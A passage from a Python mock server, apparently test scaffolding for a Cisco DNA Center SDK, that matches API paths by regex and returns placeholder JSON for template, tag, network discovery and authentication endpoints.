PNP_21a6db2540298f55_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/import")
PNP_3086c9624f498b85_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow/string")
PNP_3cb24acb486b89d2_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/sacct")
PNP_5889fb844939a13b_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/site-claim")
PNP_6f9819e84178870c_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/savacct")
PNP_7989f86846faaf99_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow/count")
PNP_70a479a6462a9496_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings/sacct/string/vacct")
PNP_7e92f9eb46db8320_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings")
PNP_8da0391947088a5a_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-settings")
PNP_848b5a7b4f9b8c12_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow")
PNP_a4b6c87a4ffb9efa_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/vacct-sync")
PNP_9e857b5a4a0bbcdb_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/reset")
PNP_af8d7b0e470b8ae2_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow/string")
PNP_cdab9b474899ae06_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/string")
PNP_aeb4dad04a99bbe3_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow")
PNP_bab6c9e5440885cc_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/string")
PNP_d9a1fa9c4068b23c_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/count")
PNP_80acb88e4ac9ac6d_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-workflow/string")
PNP_f09319674049a7d4_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/history")
PNP_e6b3db8046c99654_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device")
PNP_cf9418234d9ab37e_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/site-config-preview")
PNP_f3b26b5544cabab9_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device")
PNP_d8a619974a8a8c48_PATTERN = re.compile(r"/dna/intent/api/v1/onboarding/pnp-device/claim")
SWIM_0c8f7a0b49b9aedd_PATTERN = re.compile(r"/dna/intent/api/v1/image/importation")
SWIM_8cb6783b4faba1f4_PATTERN = re.compile(r"/dna/intent/api/v1/image/distribution")
SWIM_4dbe3bc743a891bc_PATTERN = re.compile(r"/dna/intent/api/v1/image/importation/source/file")
SWIM_fb9beb664f2aba4c_PATTERN = re.compile(r"/dna/intent/api/v1/image/activation/device")
SWIM_bc8aab4746ca883d_PATTERN = re.compile(r"/dna/intent/api/v1/image/importation/source/url")
SITE_PROFILE_7fbe4b804879baa4_PATTERN = re.compile(r"/dna/intent/api/v1/business/nfv/provisioningDetail")
SITE_PROFILE_828828f44f28bd0d_PATTERN = re.compile(r"/dna/intent/api/v1/business/nfv")
SITE_PROFILE_2f97e8fa45f8b2a3_PATTERN = re.compile(r"/dna/intent/api/v1/nfv-provision-detail")
def matches_AUTHENTICATION_ac8ae94c4e69a09d(self):
return re.search(
self.AUTHENTICATION_ac8ae94c4e69a09d_PATTERN,
self.path
)
def authentication_authentication_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({"Token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiI1ZWNmZDViMjc1MTYxMjAwY2M1NzI3ZGEiLCJhdXRoU291cmNlIjoiaW50ZXJuYWwiLCJ0ZW5hbnROYW1lIjoiVE5UMCIsInJvbGVzIjpbIjVlNWE0MzI2NzUxNjEyMDBjYzRhYzk2MyJdLCJ0ZW5hbnRJZCI6IjVlNWE0MzI1NzUxNjEyMDBjYzRhYzk1YyIsImV4cCI6MTU5NDM1NTA1NCwiaWF0IjoxNTk0MzUxNDU0LCJqdGkiOiJkYjdhODcyZC1mNzI3LTRhODUtOWU1NC00YzM4NzM0YmFjMDkiLCJ1c2VybmFtZSI6ImRldm5ldHVzZXIifQ.WuKZUPJZgqZeKCG9UZ_C22Up1Yp7CKbImjmc9Is0xEuiy2TsB07Jl7Ov__oabNhuM2KjQyrj7k62zaopg7GyC3JGkpU7-vhYdy2c1aIBLoeeEYKOJocEE-ImUeVtFqo3md3lzMVn9hdfwQkyIuU_GwXHrDrxXY9umHKiWm9aGuP1VgRpqJKxTTsHF2iLQjmgVNHon4qqBv3McjlDNZ5nBVUzvO143xQ0ztHjebFrGGBogCt4hTVbqTdaFLowW6ovdA2qt6gktjr709gkZUkxLfa5Ntbt7DjQ-HmSTZmZHIItf2RVx9P3ENvr9RQFAQ5nWCr-rMeXceyWKr9uj75Oeg"})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_00aec9b1422ab27e(self):
return re.search(
self.TEMPLATE_PROGRAMMER_00aec9b1422ab27e_PATTERN,
self.path
)
def template_programmer_create_project_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_01b09a254b9ab259(self):
return re.search(
self.TEMPLATE_PROGRAMMER_01b09a254b9ab259_PATTERN,
self.path
)
def template_programmer_getsthetemplatesavailable_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_109d1b4f4289aecd(self):
return re.search(
self.TEMPLATE_PROGRAMMER_109d1b4f4289aecd_PATTERN,
self.path
)
def template_programmer_get_projects_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps([{'name': 'string', 'id': 'string', 'templates': [{'name': 'string', 'composite': True, 'id': 'string'}]}])
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_6099da82477b858a(self):
return re.search(
self.TEMPLATE_PROGRAMMER_6099da82477b858a_PATTERN,
self.path
)
def template_programmer_deploy_template_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'deploymentId': 'string', 'deploymentName': 'string', 'devices': [{'deviceId': 'string', 'duration': 'string', 'endTime': 'string', 'ipAddress': 'string', 'name': 'string', 'startTime': 'string', 'status': 'string'}], 'duration': 'string', 'endTime': 'string', 'projectName': 'string', 'startTime': 'string', 'status': 'string', 'templateName': 'string', 'templateVersion': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_7781fa0548a98342(self):
return re.search(
self.TEMPLATE_PROGRAMMER_7781fa0548a98342_PATTERN,
self.path
)
def template_programmer_update_template_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_9480fa1f47ca9254(self):
return re.search(
self.TEMPLATE_PROGRAMMER_9480fa1f47ca9254_PATTERN,
self.path
)
def template_programmer_update_project_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_a7b42836408a8e74(self):
return re.search(
self.TEMPLATE_PROGRAMMER_a7b42836408a8e74_PATTERN,
self.path
)
def template_programmer_delete_template_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_f393abe84989bb48(self):
return re.search(
self.TEMPLATE_PROGRAMMER_f393abe84989bb48_PATTERN,
self.path
)
def template_programmer_preview_template_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'cliPreview': 'string', 'templateId': 'string', 'validationErrors': {}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_c8bf6b65414a9bc7(self):
return re.search(
self.TEMPLATE_PROGRAMMER_c8bf6b65414a9bc7_PATTERN,
self.path
)
def template_programmer_get_template_versions_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps([{'name': 'string', 'projectName': 'string', 'projectId': 'string', 'templateId': 'string', 'versionsInfo': [{'id': 'string', 'description': 'string', 'versionTime': 0}], 'composite': True}])
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_62b05b2c40a9b216(self):
return re.search(
self.TEMPLATE_PROGRAMMER_62b05b2c40a9b216_PATTERN,
self.path
)
def template_programmer_version_template_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_83a3b9404cb88787(self):
return re.search(
self.TEMPLATE_PROGRAMMER_83a3b9404cb88787_PATTERN,
self.path
)
def template_programmer_get_template_details_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'author': 'string', 'composite': True, 'containingTemplates': [{'composite': True, 'id': 'string', 'name': 'string', 'version': 'string'}], 'createTime': 0, 'description': 'string', 'deviceTypes': [{'productFamily': 'string', 'productSeries': 'string', 'productType': 'string'}], 'failurePolicy': 'ABORT_ON_ERROR', 'id': 'string', 'lastUpdateTime': 0, 'name': 'string', 'parentTemplateId': 'string', 'projectId': 'string', 'projectName': 'string', 'rollbackTemplateContent': 'string', 'rollbackTemplateParams': [{'binding': 'string', 'dataType': 'STRING', 'defaultValue': 'string', 'description': 'string', 'displayName': 'string', 'group': 'string', 'id': 'string', 'instructionText': 'string', 'key': 'string', 'notParam': True, 'order': 0, 'paramArray': True, 'parameterName': 'string', 'provider': 'string', 'range': [{'id': 'string', 'maxValue': 0, 'minValue': 0}], 'required': True, 'selection': {'id': 'string', 'selectionType': 'SINGLE_SELECT', 'selectionValues': {}}}], 'softwareType': 'string', 'softwareVariant': 'string', 'softwareVersion': 'string', 'tags': ['string'], 'templateContent': 'string', 'templateParams': [{'binding': 'string', 'dataType': 'STRING', 'defaultValue': 'string', 'description': 'string', 'displayName': 'string', 'group': 'string', 'id': 'string', 'instructionText': 'string', 'key': 'string', 'notParam': True, 'order': 0, 'paramArray': True, 'parameterName': 'string', 'provider': 'string', 'range': [{'id': 'string', 'maxValue': 0, 'minValue': 0}], 'required': True, 'selection': {'id': 'string', 'selectionType': 'SINGLE_SELECT', 'selectionValues': {}}}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_f6b119ad4d4aaf16(self):
return re.search(
self.TEMPLATE_PROGRAMMER_f6b119ad4d4aaf16_PATTERN,
self.path
)
def template_programmer_create_template_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_9c9a785741cbb41f(self):
return re.search(
self.TEMPLATE_PROGRAMMER_9c9a785741cbb41f_PATTERN,
self.path
)
def template_programmer_get_templatedeploymentstatus_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'deploymentId': 'string', 'deploymentName': 'string', 'devices': [{'deviceId': 'string', 'duration': 'string', 'endTime': 'string', 'ipAddress': 'string', 'name': 'string', 'startTime': 'string', 'status': 'string'}], 'duration': 'string', 'endTime': 'string', 'projectName': 'string', 'startTime': 'string', 'status': 'string', 'templateName': 'string', 'templateVersion': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TEMPLATE_PROGRAMMER_d0a1abfa435b841d(self):
return re.search(
self.TEMPLATE_PROGRAMMER_d0a1abfa435b841d_PATTERN,
self.path
)
def template_programmer_delete_project_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_00a2fa6146089317(self):
return re.search(
self.TAG_00a2fa6146089317_PATTERN,
self.path
)
def tag_addmemberstothetag_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_1399891c42a8be64(self):
return re.search(
self.TAG_1399891c42a8be64_PATTERN,
self.path
)
def tag_create_tag_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_429c28154bdaa13d(self):
return re.search(
self.TAG_429c28154bdaa13d_PATTERN,
self.path
)
def tag_delete_tag_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_2e9db85840fbb1cf(self):
return re.search(
self.TAG_2e9db85840fbb1cf_PATTERN,
self.path
)
def tag_get_tag_membercount_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_4695090d403b8eaa(self):
return re.search(
self.TAG_4695090d403b8eaa_PATTERN,
self.path
)
def tag_get_tagresourcetypes_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': ['string']})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_45bc7a8344a8bc1e(self):
return re.search(
self.TAG_45bc7a8344a8bc1e_PATTERN,
self.path
)
def tag_updatestagmembership_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_4d86a993469a9da9(self):
return re.search(
self.TAG_4d86a993469a9da9_PATTERN,
self.path
)
def tag_update_tag_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_8091a9b84bfba53b(self):
return re.search(
self.TAG_8091a9b84bfba53b_PATTERN,
self.path
)
def tag_get_tag_count_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_c1a359b14c89b573(self):
return re.search(
self.TAG_c1a359b14c89b573_PATTERN,
self.path
)
def tag_get_tagby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': {'systemTag': True, 'description': 'string', 'dynamicRules': [{'memberType': 'string', 'rules': {'values': ['string'], 'items': ['string'], 'operation': 'string', 'name': 'string', 'value': 'string'}}], 'name': 'string', 'id': 'string', 'instanceTenantId': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_eab7abe048fb99ad(self):
return re.search(
self.TAG_eab7abe048fb99ad_PATTERN,
self.path
)
def tag_get_tagmembersby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': [{'instanceUuid': 'string'}]})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_caa3ea704d78b37e(self):
return re.search(
self.TAG_caa3ea704d78b37e_PATTERN,
self.path
)
def tag_remove_tagmember_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': {'taskId': {}, 'url': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_TAG_ee9aab01487a8896(self):
return re.search(
self.TAG_ee9aab01487a8896_PATTERN,
self.path
)
def tag_get_tag_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'version': 'string', 'response': [{'systemTag': True, 'description': 'string', 'dynamicRules': [{'memberType': 'string', 'rules': {'values': ['string'], 'items': ['string'], 'operation': 'string', 'name': 'string', 'value': 'string'}}], 'name': 'string', 'id': 'string', 'instanceTenantId': 'string'}]})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_069d9823451b892d(self):
return re.search(
self.NETWORK_DISCOVERY_069d9823451b892d_PATTERN,
self.path
)
def network_discovery_getcountofalldiscoveryjobs_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_17929bc7465bb564(self):
return re.search(
self.NETWORK_DISCOVERY_17929bc7465bb564_PATTERN,
self.path
)
def network_discovery_create_netconfcredentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_10b06a6a4f7bb3cb(self):
return re.search(
self.NETWORK_DISCOVERY_10b06a6a4f7bb3cb_PATTERN,
self.path
)
def network_discovery_update_snmpwritecommunity_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_1da5ebdd434aacfe(self):
return re.search(
self.NETWORK_DISCOVERY_1da5ebdd434aacfe_PATTERN,
self.path
)
def network_discovery_update_snmpv3credentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_47a1b84b4e1b8044(self):
return re.search(
self.NETWORK_DISCOVERY_47a1b84b4e1b8044_PATTERN,
self.path
)
def network_discovery_update_snmpreadcommunity_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_33b799d04d0a8907(self):
return re.search(
self.NETWORK_DISCOVERY_33b799d04d0a8907_PATTERN,
self.path
)
def network_discovery_get_discoveriesbyrange_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'attributeInfo': {}, 'cdpLevel': 0, 'deviceIds': 'string', 'discoveryCondition': 'string', 'discoveryStatus': 'string', 'discoveryType': 'string', 'enablePasswordList': 'string', 'globalCredentialIdList': ['string'], 'httpReadCredential': {'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'password': 'string', 'port': 0, 'secure': True, 'username': 'string'}, 'httpWriteCredential': {'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'password': 'string', 'port': 0, 'secure': True, 'username': 'string'}, 'id': 'string', 'ipAddressList': 'string', 'ipFilterList': 'string', 'isAutoCdp': True, 'lldpLevel': 0, 'name': 'string', 'netconfPort': 'string', 'numDevices': 0, 'parentDiscoveryId': 'string', 'passwordList': 'string', 'preferredMgmtIPMethod': 'string', 'protocolOrder': 'string', 'retryCount': 0, 'snmpAuthPassphrase': 'string', 'snmpAuthProtocol': 'string', 'snmpMode': 'string', 'snmpPrivPassphrase': 'string', 'snmpPrivProtocol': 'string', 'snmpRoCommunity': 'string', 'snmpRoCommunityDesc': 'string', 'snmpRwCommunity': 'string', 'snmpRwCommunityDesc': 'string', 'snmpUserName': 'string', 'timeOut': 0, 'updateMgmtIp': True, 'userNameList': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_3d9b99c343398a27(self):
return re.search(
self.NETWORK_DISCOVERY_3d9b99c343398a27_PATTERN,
self.path
)
def network_discovery_getnetworkdevicesfrom_discovery_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_4d9ca8e2431a8a24(self):
return re.search(
self.NETWORK_DISCOVERY_4d9ca8e2431a8a24_PATTERN,
self.path
)
def network_discovery_create_httpwritecredentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_44974ba5435a801d(self):
return re.search(
self.NETWORK_DISCOVERY_44974ba5435a801d_PATTERN,
self.path
)
def network_discovery_get_snmpproperties_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'intValue': 0, 'systemPropertyName': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_4c8cab5f435a80f4(self):
return re.search(
self.NETWORK_DISCOVERY_4c8cab5f435a80f4_PATTERN,
self.path
)
def network_discovery_deletediscoveryby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_55b439dc4239b140(self):
return re.search(
self.NETWORK_DISCOVERY_55b439dc4239b140_PATTERN,
self.path
)
def network_discovery_startdiscovery_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_63bb88b74f59aa17(self):
return re.search(
self.NETWORK_DISCOVERY_63bb88b74f59aa17_PATTERN,
self.path
)
def network_discovery_get_discoveryby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'attributeInfo': {}, 'cdpLevel': 0, 'deviceIds': 'string', 'discoveryCondition': 'string', 'discoveryStatus': 'string', 'discoveryType': 'string', 'enablePasswordList': 'string', 'globalCredentialIdList': ['string'], 'httpReadCredential': {'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'password': 'string', 'port': 0, 'secure': True, 'username': 'string'}, 'httpWriteCredential': {'comments': 'string', 'credentialType': 'GLOBAL', 'description': 'string', 'id': 'string', 'instanceTenantId': 'string', 'instanceUuid': 'string', 'password': 'string', 'port': 0, 'secure': True, 'username': 'string'}, 'id': 'string', 'ipAddressList': 'string', 'ipFilterList': 'string', 'isAutoCdp': True, 'lldpLevel': 0, 'name': 'string', 'netconfPort': 'string', 'numDevices': 0, 'parentDiscoveryId': 'string', 'passwordList': 'string', 'preferredMgmtIPMethod': 'string', 'protocolOrder': 'string', 'retryCount': 0, 'snmpAuthPassphrase': 'string', 'snmpAuthProtocol': 'string', 'snmpMode': 'string', 'snmpPrivPassphrase': 'string', 'snmpPrivProtocol': 'string', 'snmpRoCommunity': 'string', 'snmpRoCommunityDesc': 'string', 'snmpRwCommunity': 'string', 'snmpRwCommunityDesc': 'string', 'snmpUserName': 'string', 'timeOut': 0, 'updateMgmtIp': True, 'userNameList': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_6bacb8d14639bdc7(self):
return re.search(
self.NETWORK_DISCOVERY_6bacb8d14639bdc7_PATTERN,
self.path
)
def network_discovery_create_snmpwritecommunity_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_948ea8194348bc0b(self):
return re.search(
self.NETWORK_DISCOVERY_948ea8194348bc0b_PATTERN,
self.path
)
def network_discovery_create_cli_credentials_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_89b36b4649999d81(self):
return re.search(
self.NETWORK_DISCOVERY_89b36b4649999d81_PATTERN,
self.path
)
def network_discovery_update_httpreadcredential_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_NETWORK_DISCOVERY_99872a134d0a9fb4(self):
return re.search(
self.NETWORK_DISCOVERY_99872a134d0a9fb4_PATTERN,
self.path
)
def network_discovery_getlistofdiscoveriesbydiscovery_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
